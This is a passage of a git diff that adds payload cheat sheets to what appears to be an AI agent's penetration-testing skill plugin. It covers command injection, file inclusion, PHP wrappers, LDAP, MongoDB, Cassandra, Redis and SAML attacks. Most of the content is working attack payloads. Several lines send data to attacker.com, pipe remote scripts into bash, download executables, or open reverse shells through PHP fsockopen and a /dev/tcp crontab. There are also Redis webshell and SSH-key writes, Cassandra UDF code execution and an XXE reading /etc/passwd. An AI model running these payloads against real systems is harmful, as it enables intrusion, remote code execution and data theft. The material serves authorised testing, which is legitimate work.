http://attacker.com/?d=$(id) +; curl -d "$(cat /etc/passwd)" http://attacker.com/ +``` + +## OOB — Reverse Shell via curl + +```bash +; curl http://attacker.com/shell.sh | bash +; wget -qO- http://attacker.com/shell.sh | bash +$(curl -s http://attacker.com/shell.sh|bash) +``` + +## Common Targets + +```bash +; cat /etc/passwd +; cat /etc/shadow +; cat /etc/hosts +; ls /home +; whoami +; id +; uname -a +; env +; cat /proc/self/environ +; ss -tlnp +; ps aux +``` + +## Newline Injection + +``` +cmd1%0acmd2 +cmd1%0d%0acmd2 +cmd1\ncmd2 +``` + +*Full list: patt-fetcher agent → "Command Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/windows.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/windows.md new file mode 100644 index 0000000..6757c2e --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/windows.md @@ -0,0 +1,85 @@ +--- +source: PayloadsAllTheThings +patt-path: Command Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Command%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Command Injection — Windows Payloads + +## CMD Separators + +```cmd +& whoami +&& whoami +| whoami +|| whoami +%0a whoami +``` + +## CMD Common Commands + +```cmd +& whoami +& net user +& ipconfig /all +& type C:\Windows\win.ini +& type C:\Windows\System32\drivers\etc\hosts +& dir C:\ +& net localgroup administrators +& systeminfo +& tasklist +``` + +## PowerShell Injection + +```powershell +; powershell -c whoami +& powershell -enc <base64> +| powershell -c "Get-Process" +& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" +``` + +## Blind — Time-Based + +```cmd +& ping -n 5 127.0.0.1 +& timeout /t 5 +& powershell -c "Start-Sleep 5" +``` + +## OOB Exfiltration + +```cmd +& powershell -c "Invoke-WebRequest -Uri 'http://attacker.com/?d='+(whoami) -UseBasicParsing" +& certutil -urlcache -split -f http://attacker.com/shell.exe shell.exe & shell.exe +& bitsadmin /transfer job http://attacker.com/shell.exe C:\Temp\shell.exe +``` + +## Variable Expansion + +```cmd +%COMSPEC% /c whoami # expands to cmd.exe +%SystemRoot%\system32\cmd.exe /c whoami +``` + +## Redirection + +```cmd +& whoami > C:\Temp\out.txt +& type C:\Temp\out.txt +``` + +## PowerShell Equivalents + +| CMD | PowerShell | +|-----|------------| +| `whoami` | `[Security.Principal.WindowsIdentity]::GetCurrent().Name` | +| `net user` | `Get-LocalUser` | +| `ipconfig` | `Get-NetIPAddress` | +| `tasklist` | `Get-Process` | +| `dir` | `Get-ChildItem` | +| `type file` | `Get-Content file` | + +*Full list: patt-fetcher agent → "Command Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/lfi.md b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/lfi.md new file mode 100644 index 0000000..b196f03 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/lfi.md @@ -0,0 +1,95 @@ +--- +source: PayloadsAllTheThings +patt-path: File Inclusion/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# LFI — Local File Inclusion Payloads + +## Basic Traversal + +``` +?page=../../../etc/passwd +?file=../../../../etc/shadow +?include=../../../etc/hosts +``` + +## Null Byte (PHP < 5.3.4) + +``` +?page=../../../etc/passwd%00 +?page=../../../etc/passwd%00.php +``` + +## Double Encoding + +``` +?page=%252e%252e%252fetc%252fpasswd +?page=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd +``` + +## UTF-8 Encoding + +``` +?page=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +``` + +## Filter Bypass + +``` +?page=....//....//etc/passwd +?page=..///////..////..//////etc/passwd +?page=..%2f..%2f..%2fetc%2fpasswd +``` + +## 15 Sensitive File Targets + +``` +/etc/passwd +/etc/shadow +/etc/hosts +/etc/hostname +/etc/crontab +/etc/apache2/apache2.conf +/etc/nginx/nginx.conf +/etc/mysql/my.cnf +/root/.ssh/id_rsa +/root/.bash_history +/home/user/.bash_history +/proc/self/environ +/proc/self/cmdline +/var/log/apache2/access.log +/var/log/auth.log +``` + +## Log Poisoning (RCE via LFI) + +**Step 1: Poison the log** +```bash +# User-Agent poison +curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/ +# SSH log poison +ssh "<?php system(\$_GET['cmd']); ?>"@target.com +``` + +**Step 2: Execute via LFI** +``` +?page=/var/log/apache2/access.log&cmd=id +?page=/var/log/auth.log&cmd=whoami +?page=/proc/self/environ&cmd=id +``` + +## /proc/self/environ Injection + +```bash +# Poison via User-Agent: +GET / HTTP/1.1 +User-Agent: <?php system($_GET['cmd']); ?> + +# Then include: +?page=/proc/self/environ&cmd=id +``` + +*Full list: patt-fetcher agent → "File Inclusion"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/rfi.md b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/rfi.md new file mode 100644 index 0000000..2c6a66e --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/rfi.md @@ -0,0 +1,75 @@ +--- +source: PayloadsAllTheThings +patt-path: File Inclusion/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# RFI — Remote File Inclusion Payloads + +## Requirements + +PHP config: `allow_url_include = On` (and `allow_url_fopen = On`) + +## Basic Remote Include + +``` +?page=http://attacker.com/shell.txt +?file=http://attacker.com/shell.php +?include=http://attacker.com/webshell.txt +``` + +## Null Byte Bypass (when extension appended) + +``` +?page=http://attacker.com/shell.txt%00 +?page=http://attacker.com/shell.txt%00.php +``` + +## Double Encoding Bypass + +``` +?page=http:%252f%252fattacker.com%252fshell.txt +?page=http:%2f%2fattacker.com%2fshell.txt +``` + +## SMB Protocol (Windows targets) + +``` +?page=\\attacker.com\share\shell.php +?page=\\10.0.0.1\share\shell.php +``` + +## FTP Protocol + +``` +?page=ftp://attacker.com/shell.txt +``` + +## Shell Content (shell.txt hosted on attacker) + +```php +<?php system($_GET['cmd']); ?> +<?php passthru($_GET['cmd']); ?> +<?php echo shell_exec($_GET['cmd']); ?> +<?php $sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?> +``` + +## Attacker Setup + +```bash +# Host malicious file +python3 -m http.server 80 + +# Or use ngrok for external access +ngrok http 80 +``` + +## Detection via Error + +RFI may trigger errors like: +- `Warning: include(): http:// wrapper is disabled` +- `Warning: include(http://attacker.com/...): failed to open stream` + +*Full list: patt-fetcher agent → "File Inclusion"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/wrappers.md b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/wrappers.md new file mode 100644 index 0000000..6b4b4e7 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/file-inclusion/payloads/wrappers.md @@ -0,0 +1,104 @@ +--- +source: PayloadsAllTheThings +patt-path: File Inclusion/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# PHP Stream Wrappers — LFI Payloads + +## php://filter — Base64 Read (source disclosure) + +``` +?page=php://filter/convert.base64-encode/resource=/etc/passwd +?page=php://filter/convert.base64-encode/resource=index.php +?page=php://filter/convert.base64-encode/resource=../config.php +?page=php://filter/read=convert.base64-encode/resource=../../config/database.php +``` + +**Decode output:** +```bash +echo "AAAA..." | base64 -d +``` + +## php://filter — String Filters + +``` +?page=php://filter/string.rot13/resource=index.php +?page=php://filter/string.toupper/resource=/etc/passwd +?page=php://filter/read=string.strip_tags/resource=index.php +``` + +## php://filter — Chained (convert+strip) + +``` +?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd +``` + +## php://input — Code Execution + +Requires: `allow_url_include=On` + +``` +POST ?page=php://input +Body: <?php system('id'); ?> +``` + +``` +POST ?page=php://input&cmd=id +Body: <?php system($_GET['cmd']); ?> +``` + +## php://stdin + +``` +?page=php://stdin +``` + +## phar:// — PHAR Deserialization + +``` +?page=phar://./uploads/file.jpg/shell +?page=phar:///var/www/html/uploads/malicious.phar/shell +``` + +**Create malicious PHAR:** +```php +<?php +$phar = new Phar('shell.phar'); +$phar->startBuffering(); +$phar->addFromString('shell.php', '<?php system($_GET["cmd"]); ?>'); +$phar->setStub('<?php __HALT_COMPILER(); ?>'); +$phar->stopBuffering(); +// rename to shell.jpg for upload bypass +``` + +## data:// — Code Injection + +``` +?page=data://text/plain,<?php system('id'); ?> +?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg== +``` + +## zip:// — Archive Inclusion + +``` +?page=zip://uploads/shell.zip#shell.php +``` + +**zip shell creation:** +```bash +echo '<?php system($_GET["cmd"]); ?>' > shell.php +zip shell.zip shell.php +``` + +## expect:// — Direct Command Execution + +Requires `expect` PHP extension: +``` +?page=expect://id +?page=expect://whoami +``` + +*Full list: patt-fetcher agent → "File Inclusion"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/basic.md new file mode 100644 index 0000000..e59ff55 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/basic.md @@ -0,0 +1,95 @@ +--- +source: PayloadsAllTheThings +patt-path: LDAP Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# LDAP Injection — Basic Payloads + +## Authentication Bypass + +**Classic OR injection:** +``` +username: * +password: * + +username: admin)(&(password=*) +password: anything + +username: *)(uid=*))(|(uid=* +password: password +``` + +**AND/NOT bypass:** +``` +username: admin)(!(&(1=0 +password: q)) +``` + +**Filter escape:** +``` +username: admin)(|(objectClass=*) +password: anything +``` + +## Wildcard Injection + +``` +username: * +username: a* +username: admin* +username: adm* +``` + +**Attribute enumeration via wildcard:** +``` +*)(ATTRIBUTE=* +*)(cn=* +*)(mail=* +*)(userPassword=* +``` + +## Blind Extraction (character by character) + +``` +# Check if password starts with 'a': +(&(sn=administrator)(userPassword=a*)) +(&(sn=administrator)(userPassword=b*)) +# Increment until response differs + +# URL parameter form: +?username=admin&password=a* +?username=admin&password=ab* +?username=admin&password=abc* +``` + +## Common Enumeratable Attributes + +``` +userPassword +surname / sn +name / cn / commonName +givenName +mail / email +objectClass +uid +memberOf +distinguishedName +``` + +## LDAP Filter Injection Points + +``` +# Search filter injection +(&(uid=INJECT)(objectClass=*)) +(|(uid=INJECT)(uid=*)) + +# Basic bypass payloads +)(uid=*) +*)(objectClass=* +admin))(|(objectClass=* +``` + +*Full list: patt-fetcher agent → "LDAP Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/bypass.md new file mode 100644 index 0000000..84f7c70 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/ldap-injection/payloads/bypass.md @@ -0,0 +1,86 @@ +--- +source: PayloadsAllTheThings +patt-path: LDAP Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# LDAP Injection — Bypass Payloads + +## Null Byte Termination + +``` +admin\x00 +admin%00 +login=*)(uid=*))\x00 +username=admin\x00&password=anything +``` + +## Encoding Bypass + +**Hex encoding of special chars:** +``` +\28 = ( +\29 = ) +\2a = * +\5c = \ +\00 = null byte + +# Encoded filter bypass: +username=admin\29\28\7c\28objectClass=\2a\29 +``` + +**URL encoding:** +``` +%28 = ( +%29 = ) +%2a = * +%5c = \ +``` + +## Nested Filter Bypass + +``` +(&(uid=admin)(!(password=invalid))) +(|(uid=admin)(uid=*)) +(&(uid=*)(objectClass=person)(!(uid=guest))) +``` + +## LDAP Comment / Escape + +``` +# LDAP does not have traditional comments like SQL +# Use attribute=value injection to close and reopen filters: +uid=admin)(objectClass=* +uid=*)(uid=admin)(objectClass=* +``` + +## OCTET STRING Matching (password fields) + +``` +userPassword:2.5.13.18:=\61 # 'a' in hex +userPassword:2.5.13.18:=\61\64 # 'ad' +userPassword:2.5.13.18:=\61\64\6d # 'adm' +``` + +## Case Insensitivity + +LDAP attribute names are case-insensitive: +``` +uid=admin +UID=admin +Uid=admin +``` + +## Special Character Reference + +| Character | LDAP Escape | Meaning | +|-----------|-------------|---------| +| `*` | `\2a` | Wildcard | +| `(` | `\28` | Open paren | +| `)` | `\29` | Close paren | +| `\` | `\5c` | Backslash | +| NUL | `\00` | Null byte | + +*Full list: patt-fetcher agent → "LDAP Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md similarity index 90% rename from projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md index ad5da3d..3855474 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-cheat-sheet.md @@ -747,6 +747,71 @@ User data displayed --- +<!-- PATT enrichment 2026-03-14 --> +## Redis Injection + +Redis is most commonly reached via SSRF using the Gopher protocol — not direct user input. + +### SSRF → Redis via Gopher (RCE) +``` +gopher://127.0.0.1:6379/_<redis-protocol-commands> +``` + +### Common attack goals +| Goal | Redis Commands | +|---|---| +| Write webshell | `SET 1 "<?php system($_GET['c']);?>" → CONFIG SET dir /var/www/html → CONFIG SET dbfilename shell.php → SAVE` | +| Write SSH key | `SET 1 "\n\nssh-rsa AAAA...\n\n" → CONFIG SET dir /root/.ssh → CONFIG SET dbfilename authorized_keys → SAVE` | +| Write crontab | `SET 1 "\n* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1\n" → CONFIG SET dir /var/spool/cron/crontabs → CONFIG SET dbfilename root → SAVE` | + +**Tool:** `Gopherus --exploit redis` — auto-generates Gopher payloads. + +### CRLF injection into Redis stream +``` +param=value%0d%0aCONFIG+SET+dir+/tmp%0d%0a +``` + +See `payloads/redis.md` for full payload set including slave replication RCE (Redis 4.x/5.x). + +--- + +## Cassandra Injection + +Cassandra uses CQL (Cassandra Query Language) — similar surface to SQL injection but with a smaller attack surface (no UNION, no subqueries). + +### Auth bypass +```sql +' OR '1'='1 +admin'-- +``` + +### UDF RCE (Cassandra < 3.0, default config) +```sql +CREATE OR REPLACE FUNCTION system.exec(inp text) + CALLED ON NULL INPUT RETURNS text LANGUAGE java AS $$ + String[] cmd = {"/bin/sh","-c",inp}; + java.util.Scanner s = new java.util.Scanner( + Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); + return s.hasNext()?s.next():""; + $$; +SELECT system.exec('id') FROM system.local; +``` + +### Default credentials +```bash +cqlsh target.com 9042 -u cassandra -p cassandra +``` + +### Keyspace enumeration +```sql +SELECT keyspace_name FROM system_schema.keyspaces; +SELECT table_name FROM system_schema.tables WHERE keyspace_name='targetks'; +``` + +See `payloads/cassandra.md` for full payload set. + +--- + **Remember:** Only test on authorized systems. Unauthorized testing is illegal. **Quick Lab Access:** https://portswigger.net/web-security/all-labs#nosql-injection diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-index.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-index.md rename to plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-quickstart.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-quickstart.md rename to plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-resources.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/nosql-injection/nosql-injection-resources.md rename to plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/cassandra.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/cassandra.md new file mode 100644 index 0000000..f63722a --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/cassandra.md @@ -0,0 +1,132 @@ +--- +source: PayloadsAllTheThings +patt-path: NoSQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/README.md +last-curated: 2026-03-14 +priority: high +--- + +# NoSQL Injection — Cassandra Payloads + +<!-- NOTE: PATT NoSQL README covers MongoDB only. Cassandra content curated from general security research. --> + +## Quick Hits + +### CQL injection — authentication bypass +```sql +-- Single-quote escape to break CQL string context +' OR '1'='1 +' OR 1=1-- +admin'-- +' OR ''=' + +-- UUID injection (if field expects UUID) +00000000-0000-0000-0000-000000000000' OR '1'='1 +``` + +### CQL BATCH injection +```sql +-- If user input flows into CQL without parameterization +'; BEGIN BATCH INSERT INTO users(id,role) VALUES(uuid(),'admin'); APPLY BATCH; -- +``` + +### ALLOW FILTERING information disclosure +```sql +-- May expose data without index if injected into WHERE clause +' ALLOW FILTERING-- +``` + +### Comment variants +```sql +-- (double dash) +// (not standard CQL but some drivers accept) +/* comment */ +``` + +## Extended List + +### CQL injection test payloads +```sql +-- Probe for errors (time-based not available in standard CQL) +' +'' +\ +'; +' OR '1'='1 +' AND '1'='2 +admin'-- +' OR 1=1 ALLOW FILTERING-- + +-- UNION not supported in CQL — use error-based or OOB instead +``` + +### UDF (User Defined Function) RCE — Cassandra < 3.0 default config +```sql +-- UDFs execute Java/JavaScript; enabled by default pre-3.0 +CREATE OR REPLACE FUNCTION system.exec(inp text) + CALLED ON NULL INPUT RETURNS text + LANGUAGE java AS $$ + String[] cmd = {"/bin/sh", "-c", inp}; + java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime() + .exec(cmd).getInputStream()).useDelimiter("\\A"); + return s.hasNext() ? s.next() : ""; + $$; + +SELECT system.exec('id') FROM system.local; +``` + +### Keyspace / table enumeration +```sql +-- Via system tables (if accessible) +SELECT keyspace_name FROM system_schema.keyspaces; +SELECT table_name FROM system_schema.tables WHERE keyspace_name='targetks'; +SELECT column_name,type FROM system_schema.columns WHERE table_name='users'; +``` + +### Blind CQL — timing via large ALLOW FILTERING +```sql +-- Force full table scan: measure response time difference +' AND token(id) > -9223372036854775808 ALLOW FILTERING-- +``` + +### Injection through object mapper frameworks +``` +# Spring Data Cassandra: CassandraRepository — findByUsername(input) +# If query built with string concat instead of @Query with bind params: +# input: admin' ALLOW FILTERING-- +# Resulting CQL: SELECT * FROM users WHERE username='admin' ALLOW FILTERING-- +``` + +### Default credentials / unauthenticated access +```bash +# Cassandra default: no auth, listen on 0.0.0.0 +cqlsh target.com 9042 +cqlsh target.com 9042 -u cassandra -p cassandra # default superuser + +# Enumerate via nodetool +nodetool -h target.com status +nodetool -h target.com describecluster +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| Prepared statements | No bypass — parameterized queries are safe | +| Authentication enabled | Default `cassandra/cassandra` credentials | +| Network firewall (9042) | Route via SSRF if internal Cassandra | +| UDF disabled | Cannot use Java RCE via UDF | +| Input sanitization | `'` → `''` (double quote escape) to probe | + +## Notes + +- Cassandra does NOT support full SQL: no UNION, no subqueries, no JOINs +- Injection surface smaller than RDBMS; focus on auth bypass and UDF RCE +- UDF RCE requires `enable_user_defined_functions: true` (default pre-3.0) +- Port 9042 (native), 9160 (Thrift legacy), 7199 (JMX) +- Tools: cqlsh (built-in client), NoSQLMap, Cassandra-Audit +- Always check for unauthenticated access first — extremely common misconfiguration +- If parameterized queries used throughout, focus shifts to auth/privilege escalation + +--- +*Full list: `patt-fetcher` agent → "NoSQL Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/mongodb.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/mongodb.md new file mode 100644 index 0000000..a33d768 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/mongodb.md @@ -0,0 +1,103 @@ +--- +source: PayloadsAllTheThings +patt-path: NoSQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# NoSQL Injection — MongoDB Payloads + +## Operator Injection + +**$ne (Not Equal) — auth bypass:** +```json +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} +{"username": {"$ne": ""}, "password": {"$ne": ""}} +``` + +URL-encoded form: +``` +username[$ne]=toto&password[$ne]=toto +username[$ne]=null&password[$ne]=null +``` + +**$gt (Greater Than):** +```json +{"username": {"$gt": ""}, "password": {"$gt": ""}} +{"username": {"$gt": undefined}, "password": {"$gt": undefined}} +``` + +**$nin (Not In) — exclude known users:** +```json +{"username": {"$nin": ["admin","root","administrator"]}, "password": {"$gt": ""}} +``` + +## Authentication Bypass + +**JSON body:** +```json +{"username": {"$ne": null}, "password": {"$ne": null}} +{"username": "admin", "password": {"$ne": "invalid"}} +{"username": {"$gt": ""}, "password": {"$gt": ""}} +``` + +**URL parameters:** +``` +login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +login[$regex]=a.*&pass[$ne]=lol +``` + +## $regex — Blind Extraction + +Character by character: +```json +{"username": {"$eq": "admin"}, "password": {"$regex": "^a"}} +{"username": {"$eq": "admin"}, "password": {"$regex": "^ab"}} +{"username": {"$eq": "admin"}, "password": {"$regex": "^abc"}} +``` + +URL parameter form: +``` +?username=admin&password[$regex]=^a +?username=admin&password[$regex]=^ab +``` + +## $where — JavaScript Injection + +```json +{"$where": "this.username == 'admin'"} +{"$where": "sleep(5000)"} +{"$where": "1==1"} +{"$where": "function() { return this.username == 'admin'; }"} +``` + +URL injection: +``` +?search[$where]=sleep(5000) +?search=admin';sleep(5000)// +``` + +## Blind Timing Attack + +```json +{"username": "admin", "$where": "sleep(5000)"} +{"$where": "if(this.username=='admin'){sleep(5000)}else{return false;}"} +``` + +## Array Injection + +```json +{"username": ["admin", "administrator"], "password": {"$ne": "x"}} +``` + +## Aggregation Bypass + +``` +?field[$regex]=.* +?field[$exists]=true +?field[$type]=2 +``` + +*Full list: patt-fetcher agent → "NoSQL Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/redis.md b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/redis.md new file mode 100644 index 0000000..595eaaa --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/redis.md @@ -0,0 +1,127 @@ +--- +source: PayloadsAllTheThings +patt-path: NoSQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/README.md +last-curated: 2026-03-14 +priority: high +--- + +# NoSQL Injection — Redis Payloads + +<!-- NOTE: PATT NoSQL README covers MongoDB only. Redis content curated from general security research. --> + +## Quick Hits + +### SSRF → Redis via Gopher (RCE) +``` +# Gopher protocol sends raw TCP to Redis +gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2456%0D%0A%0A%0A%2F%2F...webshell...%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A%2Fvar%2Fwww%2Fhtml%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A +``` + +### Gopher payload generation +```python +# Convert Redis commands to Gopher URL +import urllib.parse + +def redis_to_gopher(commands): + payload = "" + for cmd in commands: + parts = cmd.split(' ') + payload += f"*{len(parts)}\r\n" + for p in parts: + payload += f"${len(p)}\r\n{p}\r\n" + return "gopher://127.0.0.1:6379/_" + urllib.parse.quote(payload) +``` + +### Redis command injection (string interpolation) +``` +# If user input is interpolated into Redis commands: +GET user:${username} # input: * → dumps all keys +# CRLF injection into value: +value = "x\r\nCONFIG SET dir /tmp\r\n" +``` + +### CRLF injection into Redis stream +``` +# Inject \r\n into parameter to break Redis protocol framing +username=user%0d%0aCONFIG+SET+dir+/tmp%0d%0a +``` + +## Extended List + +### Gopher-based Redis RCE commands + +**Write SSH authorized_keys:** +``` +FLUSHALL +SET 1 "\n\nssh-rsa AAAA...attacker-pubkey...\n\n" +CONFIG SET dir /root/.ssh +CONFIG SET dbfilename authorized_keys +SAVE +``` + +**Write crontab:** +``` +SET 1 "\n* * * * * root bash -i >& /dev/tcp/attacker.com/4444 0>&1\n" +CONFIG SET dir /var/spool/cron/crontabs +CONFIG SET dbfilename root +SAVE +``` + +**Write webshell:** +``` +SET 1 "<?php system($_GET['cmd']);?>" +CONFIG SET dir /var/www/html +CONFIG SET dbfilename cmd.php +SAVE +``` + +### Slave replication RCE (Redis 4.x/5.x) +```bash +# Rogue Redis server + redis-rogue-server tool +# Attacker Redis acts as master, victim loads attacker's .so module +redis-cli -h victim.com SLAVEOF attacker.com 6379 +redis-cli -h victim.com MODULE LOAD /tmp/attacker.so +redis-cli -h victim.com evil.exec "id" +``` + +### Lua sandbox escape (Redis EVAL) +``` +# If EVAL is available and user controls script +EVAL "return redis.call('CONFIG','SET','dir','/tmp')" 0 +EVAL "return tonumber(io.popen('id'):read('*l'))" 0 +``` + +### Authentication brute force +```bash +redis-cli -h target.com -p 6379 AUTH password +# Common passwords: "" (empty), "redis", "admin", "foobared" +``` + +### Key enumeration via SSRF +``` +# Gopher: KEYS * to enumerate +gopher://127.0.0.1:6379/_%2A2%0D%0A%244%0D%0AKEYS%0D%0A%241%0D%0A%2A%0D%0A +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| Redis bind 127.0.0.1 | Route via SSRF/Gopher | +| AUTH password required | Brute force common passwords | +| Rename-command CONFIG | Find renamed command in config | +| ACL restrictions (Redis 6+) | Enumerate accessible commands | +| Disable EVAL/SLAVEOF | Try alternative RCE (CONFIG SET) | + +## Notes + +- Redis injection most commonly reached via SSRF → Gopher protocol +- Tools: redis-rogue-server, Gopherus (auto-generates Gopher payloads) +- `Gopherus --exploit redis` auto-builds Redis Gopher payloads +- CONFIG SET requires write perms to filesystem directory +- Redis 6+ ACLs limit exposure; check version before assuming full access +- Blind check: use DNS OOB via Gopher DEBUG sleep timing + +--- +*Full list: `patt-fetcher` agent → "NoSQL Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/saml-injection/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/injection/saml-injection/payloads/basic.md new file mode 100644 index 0000000..8d5ad95 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/saml-injection/payloads/basic.md @@ -0,0 +1,126 @@ +--- +source: PayloadsAllTheThings +patt-path: SAML Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SAML%20Injection/README.md +last-curated: 2026-03-14 +priority: high +--- + +# SAML Injection — Basic Payloads + +## Quick Hits + +### Signature Stripping +Remove `<ds:Signature>` block entirely from a valid SAML response: +```xml +<saml2:Assertion> + <saml2:Subject> + <saml2:NameID>admin</saml2:NameID> + </saml2:Subject> +</saml2:Assertion> +``` + +### XML Comment Injection (NameID fragmentation) +```xml +<NameID>legitimate@victim.com<!--INJECT-->.attacker.com</NameID> +``` +Some parsers read up to `<!--` and extract `legitimate@victim.com`. + +### XXE Inside SAML Response +```xml +<!DOCTYPE Response [ + <!ENTITY xxe SYSTEM "file:///etc/passwd"> +]> +<saml2p:Response> + <saml2:AttributeValue>&xxe;</saml2:AttributeValue> +</saml2p:Response> +``` + +### XSLT RCE via Transform Element +```xml +<ds:Transform> + <xsl:stylesheet> + <xsl:template match="doc"> + <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> + <xsl:variable name="url" select="concat('http://attacker.com/',$file)"/> + <xsl:value-of select="unparsed-text($url)"/> + </xsl:template> + </xsl:stylesheet> +</ds:Transform> +``` + +## Extended List + +### XML Signature Wrapping (XSW) Patterns + +**XSW1** — Duplicate response before 